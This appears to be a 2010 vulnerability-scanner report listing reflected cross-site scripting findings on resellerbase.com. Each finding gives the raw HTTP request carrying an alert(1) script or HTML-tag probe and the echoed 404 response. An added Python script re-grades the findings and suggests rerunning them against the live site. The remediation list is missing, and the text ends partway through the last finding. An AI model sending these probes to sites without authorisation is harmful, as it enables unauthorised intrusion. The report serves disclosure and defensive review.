The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.resellerbase.com/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90ec1<script>alert(1)</script>3550cc93fddcbb3b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /a90ec1<script>alert(1)</script>3550cc93fddcbb3b0?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/a
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:15:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a90ec1<script>alert(1)</script>3550cc93fddcbb3b0?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.2. http://www.resellerbase.com/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9fad8<script>alert(1)</script>110a704fa4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a9fad8<script>alert(1)</script>110a704fa4a HTTP/1.1
Accept: */*
Referer: http://resellerbase.com/login.php?f=13988f"><img%20src%3da%20onerror%3dalert(1)>bdfb399a39b&b=%2Fcp%2F
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a9fad8<script>alert(1)</script>110a704fa4a was not found on this server.</p>
...[SNIP]...

2.3. http://www.resellerbase.com/a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload adb95<script>alert(1)</script>690cd44ec00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?adb95<script>alert(1)</script>690cd44ec00=1 HTTP/1.1
Accept: */*
Referer: http://resellerbase.com/login.php?f=13988f"><img%20src%3da%20onerror%3dalert(1)>bdfb399a39b&b=%2Fcp%2F
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a?adb95<script>alert(1)</script>690cd44ec00=1 was not found on this server.</p>
...[SNIP]...

2.4. http://www.resellerbase.com/a [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /a

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload de35a<a>0b2684ef8f7 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fde35a<a>0b2684ef8f7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/a
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fde35a<a>0b2684ef8f7 was not found on this server.</p>
...[SNIP]...

2.5. http://www.resellerbase.com/a/more2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /a/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da437<script>alert(1)</script>e93ebbc7104 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ada437<script>alert(1)</script>e93ebbc7104/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:19:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /ada437<script>alert(1)</script>e93ebbc7104/more2.html was not found on this server.</p>
...[SNIP]...

2.6. http://www.resellerbase.com/a/more2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /a/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc076<script>alert(1)</script>a75a609a25c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a/cc076<script>alert(1)</script>a75a609a25c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:19:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a/cc076<script>alert(1)</script>a75a609a25c was not found on this server.</p>
...[SNIP]...

2.7. http://www.resellerbase.com/add.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /add.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57f5c<script>alert(1)</script>ec0ace067d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add.php57f5c<script>alert(1)</script>ec0ace067d HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /add.php57f5c<script>alert(1)</script>ec0ace067d was not found on this server.</p>
...[SNIP]...

2.8. http://www.resellerbase.com/add.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /add.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c616<script>alert(1)</script>888295c8e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /add.php1c616<script>alert(1)</script>888295c8e1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=15
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: multipart/form-data; boundary=--------303737341
Content-Length: 1398

----------303737341
Content-Disposition: form-data; name="cat"

7
----------303737341
Content-Disposition: form-data; name="reciprocal_url"

555-555-0199@example.com
----------303737341
Conte
...[SNIP]...

Response (redirected)

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /add.php1c616<script>alert(1)</script>888295c8e1 was not found on this server.</p>
...[SNIP]...

2.9. http://www.resellerbase.com/admin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /admin/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4de5<script>alert(1)</script>3300277d6f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adminb4de5<script>alert(1)</script>3300277d6f7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:20:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adminb4de5<script>alert(1)</script>3300277d6f7/ was not found on this server.</p>
...[SNIP]...

2.10. http://www.resellerbase.com/admin/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /admin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f94"><a>7160faa71c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3f94\"><a>7160faa71c3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /admin/?e3f94"><a>7160faa71c3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:18:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/admin/?e3f94\"><a>7160faa71c3=1" />
...[SNIP]...

2.11. http://www.resellerbase.com/adult/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a724<script>alert(1)</script>c6b93586a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult1a724<script>alert(1)</script>c6b93586a0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult1a724<script>alert(1)</script>c6b93586a0/ was not found on this server.</p>
...[SNIP]...

2.12. http://www.resellerbase.com/adult/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1841<script>alert(1)</script>7a37c5847d6b5e05a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adulta1841<script>alert(1)</script>7a37c5847d6b5e05a/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adulta1841<script>alert(1)</script>7a37c5847d6b5e05a/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.13. http://www.resellerbase.com/adult/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d349<script>alert(1)</script>6692d3178e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/?9d349<script>alert(1)</script>6692d3178e1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/?9d349<script>alert(1)</script>6692d3178e1=1 was not found on this server.</p>
...[SNIP]...

2.14. http://www.resellerbase.com/adult/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 93ec0<a>0027d4a6da2 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f93ec0<a>0027d4a6da2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:29:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f93ec0<a>0027d4a6da2 was not found on this server.</p>
...[SNIP]...
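
Every finding from 2.11 onward in this section, the "Certain" ones (2.11, 2.12, 2.13) and the "Firm" ones (2.14 and the later link_id/select entries) alike, reflects through the same sink: the site's custom 404 page copies the requested URL into "<p>The requested URL ... was not found on this server.</p>" without HTML encoding, so whatever sits in the path or query string lands in HTML text context. Two things a reviewer should check before counting these as separate vulnerabilities or as browser-exploitable: first, they are one root cause (the 404 handler), not twenty; second, the scanner sent "<" and ">" raw in the request line, whereas a browser percent-encodes them in a URL it navigates to, so the finding only executes through a browser if the server decodes the URI before echoing it. The script below is an added example, not code from the report or from resellerbase.com. It builds a constructed stand-in for the observed 404 page (its escape/decode/strip switches are assumptions used to model possible server behaviours, not anything the report establishes), then re-tests a reflection the way the report grades it: a raw script probe reflected is "certain", a bare tag reflected but no script proof of concept is "firm", and it separately records whether the browser-encoded form still reflects.

```python
import html
import re
from typing import Callable, Dict, Tuple
from urllib.parse import unquote

# Probes in the shape the report's scanner uses, wrapped in marker strings so the
# reflection can be located unambiguously in the response body (markers assumed).
SCRIPT_PROBE = "<script>alert(1)</script>"
TAG_PROBE = "<a>"
MARKER = ("z7q", "q7z")


def browser_encode_path(path: str) -> str:
    """Approximate what a browser does to a URL path before sending it:
    percent-encode space, double quote, < and >, and leave the rest alone.
    The scanner in this report sent < and > raw, which a browser will not."""
    return (path.replace(" ", "%20").replace('"', "%22")
                .replace("<", "%3C").replace(">", "%3E"))


def reflected_context(body: str, payload: str) -> str:
    """How (if at all) the payload came back: 'raw' (executable in HTML text
    context), 'html-encoded' (the sink escapes output), 'url-encoded' (the
    server echoed the percent-encoded form, inert in HTML) or 'absent'."""
    if payload in body:
        return "raw"
    if html.escape(payload, quote=False) in body:
        return "html-encoded"
    if browser_encode_path(payload) in body:
        return "url-encoded"
    return "absent"


def make_server(escape_output: bool, decode_uri: bool,
                strip_script: bool = False) -> Callable[[str], str]:
    """Constructed stand-in for the custom 404 page seen in this report (not the
    site's real code). escape_output=False reproduces the observed behaviour:
    the request URI is copied into '<p>The requested URL ... was not found'
    with no HTML encoding. decode_uri models whether the server percent-decodes
    the path before echoing it (unknown from the report); strip_script models a
    naive tag filter that would explain a 'firm' rather than 'certain' grade."""
    def send(request_uri: str) -> str:
        shown = unquote(request_uri) if decode_uri else request_uri
        if strip_script:
            shown = re.sub(r"</?script[^>]*>", "", shown, flags=re.IGNORECASE)
        if escape_output:
            shown = html.escape(shown, quote=True)   # the fix: encode for HTML text
        return ("<html><head><title>Error 404 - Page Not Found</title></head><body>"
                f"<p>The requested URL {shown} was not found on this server.</p>"
                "</body></html>")
    return send


def assess(send: Callable[[str], str], base_path: str = "/adult") -> Dict[str, object]:
    """Re-test a reflected-XSS finding the way a reviewer would: send each probe
    both raw (as the scanner did) and browser-encoded, then grade the result."""
    pre, post = MARKER
    results: Dict[str, Tuple[str, str]] = {}
    for name, probe in (("script", SCRIPT_PROBE), ("tag", TAG_PROBE)):
        payload = f"{pre}{probe}{post}"
        raw = reflected_context(send(base_path + payload + "/"), payload)
        via_browser = reflected_context(
            send(base_path + browser_encode_path(payload) + "/"), payload)
        results[name] = (raw, via_browser)

    script_raw, script_browser = results["script"]
    tag_raw, tag_browser = results["tag"]
    if script_browser == "raw":
        confidence = "certain"            # executes when a browser delivers the URL
    elif script_raw == "raw":
        confidence = "certain-raw-only"   # needs a client that sends < > unencoded
    elif "raw" in (tag_raw, tag_browser):
        confidence = "firm"               # tag injection works, script PoC does not
    elif "html-encoded" in (script_raw, script_browser, tag_raw, tag_browser):
        confidence = "encoded-sink"       # output encoding is in place
    else:
        confidence = "none"
    return {"probes": results, "confidence": confidence}


if __name__ == "__main__":
    for label, server in (("observed, decodes URI", make_server(False, True)),
                          ("observed, no decode", make_server(False, False)),
                          ("naive script filter", make_server(False, True, strip_script=True)),
                          ("escaped output", make_server(True, True))):
        print(f"{label:22s} -> {assess(server)['confidence']}")
```

The grade "certain-raw-only" is the caveat the report does not surface: the reflection is real, but if the server does not decode the path, a URL a victim clicks in a browser arrives with %3Cscript%3E and the page shows it inertly. Against the live target, replace the constructed send() with a function that performs the HTTP request and returns the body, and run assess() once per sink rather than once per scanner entry.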

2.15. http://www.resellerbase.com/adult/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52684<script>alert(1)</script>55569787c12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult52684<script>alert(1)</script>55569787c12/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult52684<script>alert(1)</script>55569787c12/googlepr.php was not found on this server.</p>
...[SNIP]...

2.16. http://www.resellerbase.com/adult/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45489<script>alert(1)</script>234a8832dbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/googlepr.php45489<script>alert(1)</script>234a8832dbb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
